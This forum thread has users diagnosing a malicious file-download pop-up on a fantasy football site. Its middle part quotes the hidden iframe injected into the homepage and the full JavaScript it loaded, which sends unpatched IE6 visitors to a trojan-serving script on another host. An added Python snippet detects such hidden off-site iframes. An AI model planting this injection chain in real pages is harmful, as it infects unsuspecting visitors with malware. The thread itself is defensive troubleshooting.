Windows pop-up screen

GoRaiders

Footballguy
Anybody else getting that windows pop-up screen when they go to the FBGs home page? Every time I hit the home page it comes up. Mine comes up for a split second then disappears. Too fast to read or tell what it is. You may have not even noticed. Looks like the box that pops up when you are downloading something.

 
I don't get it, but I work in Online Advertising and this sounds like you probably have software installed (you probably didn't even know you did it) that calls up pop-up ads when you are on certain types of sites (i.e. financial, football, etc.). It usually comes bundled when you download something like Gator, Kazaa, etc. Very annoying...

 
Not an ad pop-up, it is an actual windows screen. The same one you get when you download... say the draft dom or something like that. Work CPU, so no Kazaa or anything like that. Firewall, etc. Only happening on this site. No others I go to. Hmmmm, maybe it's just me.

 
Download Spybot Search and Destroy and you can scan for the adware and spyware and remove it.

 
I was able to catch it with a print screen as it came up. It is a windows file download screen (the one with the world in the left upper corner and the file in the right). Says it is downloading TXTPROG.EXE from 216.247.117.113 into a Temp folder.

 
I'm getting it too. Thought it was spyware, but I've run spybot and adaware and it isn't finding anything.

 
I am also getting the pop-up, and I also ran spyware. Anyone else have any ideas, maybe we can bump this until someone from the site can get a look at it.

 
Yep I get it also, very annoying... Started about 2 days ago...
 
Getting it too... Anyone know what it is? Annoying and a little spooky with the recent virus attacks against FBG's......

 
Sorry to say, but I am glad it just wasn't me. Did a spyware scan and it did not clear it. (although it did find some other cookies out there, thanks GregR) Is everyone else getting the same message?
Opening:Readme[1].Txtprog.exe from 216.247.117.113

 
I'm not getting that. But, I did a google.com search on txtprog.exe and found these:

Link1

Link2

It's some kind of trojan/trojan creator. Whatever you do, don't execute that thing. I highly suggest you do a thorough virus scan/cleaning of your computer.

Link1 is to what appears to be a hacker forum discussing how great these jerks are in creating this stuff.

Link2 is to Pest Patrol which will detect and remove (according to them) this pest. I have Pest Patrol which may be why I'm not getting this.

 
Good info, PocketPasser, I was about to post the same links you found. Doesn't seem to be much info out there but I think it pays to be careful (especially if the emails to FBG addresses are bouncing too).

 
I am not getting it, running Windows XP Pro, Internet Explorer v. 6.00
I tried now too and I'm not getting it either. Same setup as Alias. Edit to add that I was never getting it since that didn't seem clear. I just hadn't tried until I posted this message. What's the setup of those of you getting it?

 
I'm not getting it either. This is definitely the department of Dodds and/or Maxwell. They'll figure it out as soon as possible.

 
I am getting the pop up also but only on my work computer. I thought it was a "big brother" thing. Hopefully it isn't and I can get back to "work" without worrying about someone watching over me!!

 
Are any of you guys that were getting it, still getting it? If it's there, this could be a case of php injection (not saying it is, but could be). Only thing I've found about the .exe is a case of php injection. Might want to update your IE. I have the latest patches, maybe that's why I'm not seeing it.

 
Opening:Readme[1].Txtprog.exe from 216.247.117.113
Interesting (maybe). If you look at the source for the footballguys.com page this is at the end:
<iframe src=http://216.247.117.114/inf.html width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe>
Don't know if anyone there works for Vita Consulting. :confused:
 
Just now tried getting on FBG's homepage and got the download, I guess it was, it happened so fast. I remember the same thing happening before, but I paid no attention to it :o

 
The 214.247.117.xx addresses and footballguys.com are all hosted by the same hosting service. Maybe that explains some of the strange IP's showing up. :confused:

 
What is weird is I downloaded the front page and that iframe code isn't there. It is being dynamically attached somehow and possibly not from our server. The technical experts from Interland are scanning our entire box and looking into how this can be happening. I pointed them to this thread.
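
The comparison described in that post (the file on disk has no such iframe, the page as served does) can be automated. The Python below is an added example, not code from this thread or from the site; the sample pages, the function names and the exact-host comparison are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample pages. The injected tag is the one quoted in the thread;
# the surrounding markup is made up for this example.
ON_DISK = ("<html><body><h1>Home</h1>"
           "<iframe src=/scores.html width=300 height=200></iframe></body></html>")
AS_SERVED = ON_DISK + (
    "<iframe src=http://216.247.117.114/inf.html width=0 height=0 "
    "frameborder=0 marginwidth=0 marginheight=0></iframe>")


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag, quoted or not."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append({k: (v or "") for k, v in attrs})


def _is_zero(value):
    """True for "0", "0px" or "0%"."""
    return value.strip().rstrip("px%").strip() == "0"


def _is_invisible(attrs):
    """True when the frame is sized or styled so a visitor cannot see it."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return (_is_zero(attrs.get("width", "")) or _is_zero(attrs.get("height", ""))
            or "display:none" in style or "visibility:hidden" in style)


def hidden_offsite_iframes(html, site_host):
    """Return the src of each invisible iframe that loads from another host."""
    collector = _IframeCollector()
    collector.feed(html)
    hits = []
    for attrs in collector.frames:
        src = attrs.get("src", "")
        host = urlparse(src).hostname  # None for relative (same-site) URLs
        # Assumption: any host other than site_host counts as off-site.
        if host and host.lower() != site_host.lower() and _is_invisible(attrs):
            hits.append(src)
    return hits


def injected_in_transit(disk_html, served_html, site_host):
    """Hidden off-site iframes in the served response but not in the file."""
    known = set(hidden_offsite_iframes(disk_html, site_host))
    return [s for s in hidden_offsite_iframes(served_html, site_host)
            if s not in known]


if __name__ == "__main__":
    print(injected_in_transit(ON_DISK, AS_SERVED, "footballguys.com"))
```

A hit that appears only in the served copy points at something between the stored file and the visitor (a server module, an include, or a compromised host), which is where the hosting provider's scan would need to look.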
 
I e-mailed David about this yesterday. Been getting it for a couple of days on XP/IE 6.0. Is anyone actually getting the file to download? Fortunately whenever it happens to me I also get an error window that says "Windows cannot access the specified device, path or file. You may not have the appropriate permissions to access the item." No sign of any file on my hard drive anywhere either.

 
It's still there... Please, I don't understand all this technical jargon.... Does anyone know what it is in "puter illiterate" terms....... Running Windows 2000/IE6

 
A trojan horse to a computer is just what it was for the ancient Greeks, a seemingly innocent gift that is in fact dangerous. On a computer, it is a file that looks ok, but when downloaded and executed, it will install other software that creates "backdoors", or sneaky ways for someone else to access and gain control of your computer without you ever knowing it. These are usually used to either set up your computer so it can either be used in a Denial of Service (DOS) attack on other computers, like flooding a server with spam, and/or to capture information like logons, passwords, and even your credit information if you use your credit card to buy stuff over the internet. This information is then sent back to a central server where the hacker that sent you the trojan horse can access it. Not good.

I read all of what was posted in that hacker forum, the Link1 I posted above. If I'm reading it correctly, their trojan only works with IE6, and only if it is an unpatched version of IE6. Several of the hackers seemed to be saying it wouldn't work with IE5.0/5.5. Now, I'm using IE5 (home, old work computer) or a patched version of IE6 (new work computer) and I don't get the pop-up so this seems to bear out the idea that only unpatched IE6 is vulnerable. I'm not sure about using Netscape (or Mozilla). Hope that's clear for you.
 
Forgot to mention, I run all the Windows Updates as prompted by XP. If you are worried about this, go to Windows Update and get your system up to date.

 
Looks like you are correct. The exploit only works with unpatched IE6. For those that are experiencing the popup, it looks like a good idea to dl the IE6 patch and install it. Judging from the banter in link 1, it looks as if there is an update of this exploit on the horizon :rolleyes: .
 
I've been getting it for a few days now too. damn some people have just been trying to kill FBG.com ....must have gotten toasted by a shark on draft day last year :)

 
I checked out that 216.247.117.114/inf.html page that's listed at the end of the FBG.com homepage source. Here's what that page's source is:

<html>
<script LANGUAGE="javascript">
<!--
function ereg(tofind,tocheck)
{
  exist=tocheck.indexOf(tofind);
  if(exist==-1) { return false; }
  else { return true; }
}

function FindMaxP()
{
  Max=0;
  PList = clientInformation.appMinorVersion;
  TabSplit=new Array();
  PVersTab=new Array();
  CharToClear=/\s/g;
  PList=PList.replace(CharToClear,"");
  rech=/\;/;
  TabSplit=PList.split(rech);
  for(i=0,key=0;i<TabSplit.length;i++)
  {
    PString=TabSplit[i];
    TempLength=PString.length;
    FirstChar=PString.substring(0,1);
    FirstChar=FirstChar.toUpperCase();
    if(FirstChar=="Q")
    {
      ToKeep=PString.substring(1,TempLength);
      PVersTab[key]=ToKeep;
      key++;
    }
  }
  Max=PVersTab[0];
  for(i=0;i<PVersTab.length;i++)
  {
    ValTemp=PVersTab[i];
    if(ValTemp>Max) { Max=ValTemp; }
  }
  return Max;
}

function IsP()
{
  var ms = navigator.appVersion;
  PList = clientInformation.appMinorVersion;
  SP_found = ereg("SP",PList);
  if(ereg("MSIE 6",ms))
  {
    Max=FindMaxP();
    if(SP_found == true || Max>=313675) { }
    else { window.location.href='http://216.247.117.113/cgi-bin/readme.pl'; }
  }
}
//-->
</SCRIPT>
<body onload="IsP();"></body>
</html>

Since I'm running Mozilla on Linux, I really don't have a fear of loading up these pages since I doubt they make the trojans for my setup.

Also, it's too bad that the whitespace gets fubar'd on this board.

Edit: From the looks of the 216.247.117.113/cgi-bin/readme.pl code that this javascript loads, it appears to be a trojan intended to infect Win32 systems. It's calling some APIs in the Windows System32 directory most likely. I'm no security expert but this looks pretty bad IMO.

Also, the last bit of HTML that generates this popup is on every page of the main FBG site I believe, but it is not on the message boards site. I think you guys run these off different servers anyway, so that might explain it.

 
I checked my firewall logs and my firewall seems to be blocking traffic from a remote host with an IP address of 192.168.1.1. The blocked times seem consistent with times that I have connected with FBG's. I am hoping that my firewall is taking care of the problem for my computer

 
here is information that I found, about the IP address that I found (192.168.1.1 previous message)

OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US
NetRange: 192.168.0.0 - 192.168.255.255
CIDR: 192.168.0.0/16
NetName: IANA-CBLK1
NetHandle: NET-192-168-0-0-1
Parent: NET-192-0-0-0-0
NetType: IANA Special Use
NameServer: BLACKHOLE-1.IANA.ORG
NameServer: BLACKHOLE-2.IANA.ORG
Comment: This block is reserved for special purposes.
Comment: Please see RFC 1918 for additional information.
Comment:
RegDate: 1994-03-15
Updated: 2002-09-16
OrgTechHandle: IANA-ARIN
OrgTechName: Internet Corporation for Assigned Names and Number
OrgTechPhone: +1-310-823-9358
OrgTechEmail: res-ip@iana.org
# ARIN WHOIS database, last updated 2003-07-29 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

 
192.168.1.1 is often the internal IP used for a router. I have an internet gateway that uses a similar IP (192.168.2.1 methinks). Are you on a network by chance?
 
Here is more (I think) info on IP 192.168.1.1

07/30/03 11:49:19 IP block 216.247.117.114
Trying 216.247.117.114 at ARIN
Trying 216.247.117 at ARIN
OrgName: Interland
OrgID: INTD
Address: 34 Peachtree St., NW
City: Atlanta
StateProv: GA
PostalCode: 30303
Country: US
NetRange: 216.247.0.0 - 216.247.255.255
CIDR: 216.247.0.0/16
NetName: INTERLAND-3
NetHandle: NET-216-247-0-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
NameServer: A.NS.INTERLAND.NET
NameServer: B.NS.INTERLAND.NET
NameServer: C.NS.INTERLAND.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 1999-10-21
Updated: 2002-03-04
TechHandle: BW995-ARIN
TechName: Wright, Barry
TechPhone: +1-404-720-8301
TechEmail: asnadmin@interland.com

:boxing:

 
Just to expand on what's been said for the computer illiterate...

If you are using the latest version of Internet Explorer, which is IE 6 with Service Pack 1, it doesn't affect you. That's what I'm using and I haven't ever seen this problem with the FBG site.

If you're already running IE 6, you can get Service Pack 1 at Microsoft's download page.

Even though FBG's is going to fix the issue, you still want to get this patch because another website you visit could have the same issue and infect you.

 
Paul, the 192.168.1.1 IP is reserved for internal IPs like those on a LAN, which you probably have set up due to using a router, or maybe you're getting assigned a "private" IP from your corporate router or something. Anyway, the 192.168.1.1 is a red herring. The 192.168.X.X and the 10.0.X.X netblocks are reserved for private use and are not external addresses found on the internet.

The next IP you gave is 216.247.117.114, which is part of the Interland netblock which I believe serves the webpages for footballguys.com, but not for the forums here. The 216.247.117.114 is also a red herring in my opinion as I don't think that Interland is inserting the malicious code into the footballguys.com pages as they are their customers and I'm sure FBG pays a pretty penny for all the data they transmit.

The people who are hosting the perl script (216.247.117.113) that is doing the Windows API calls however are dotcomsystems.com. Probably some hacker put the script there and they don't even know about it. This is interesting.
 
For those of you who are getting it and have not downloaded the patch..... Do it now! I just did it and I am no longer getting that pop-up screen. Thanks for the link GregR. Hopefully FBGs will still figure this one out and let us all know.

 
You're welcome... and I should have said, if you don't know what version you are on, click on the Help Menu, then "About Internet Explorer". If you're on IE 6 it should say at the top version 6.0 with some other numbers after it. 2 or 3 lines below that it should say:
Update Versions:; SP1;
If you have that, then you have Service Pack 1 installed already.
 
just noticed that at work i have IE 5.0 and i am NOT getting the pop-ups...don't know what this means, just thought i'd pass it on...

 
According to the information in link 1, the only version the exploit works with is IE 6.0 - unpatched. It doesn't work with 5.0, 5.5 or 6.0-SP1.
 
